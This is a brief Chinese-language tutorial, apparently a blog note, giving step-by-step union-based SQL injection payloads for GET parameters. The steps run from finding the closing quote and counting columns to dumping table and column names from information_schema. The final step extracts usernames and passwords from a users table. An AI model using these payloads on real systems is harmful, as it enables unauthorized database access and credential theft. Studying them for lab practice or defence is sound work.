GET类型
1.判断是字符型还是数字型
2-1
2.通过报错判断闭合符
"
’
‘’ LIMIT 0,1
3.确认查询的字段数量
order by 3
4.确认占位信息
union select 1,2,3 --+
5.爆库名
union select 1,2,database() --+
6.爆表名
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sql'--+
7.爆表字段
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='sql' and table_name='users'--+
8.爆用户名和密码
union select 1,2,group_concat(concat_ws(',',username,password) SEPARATOR '|') from users --+
欢迎关注我的博客行云博客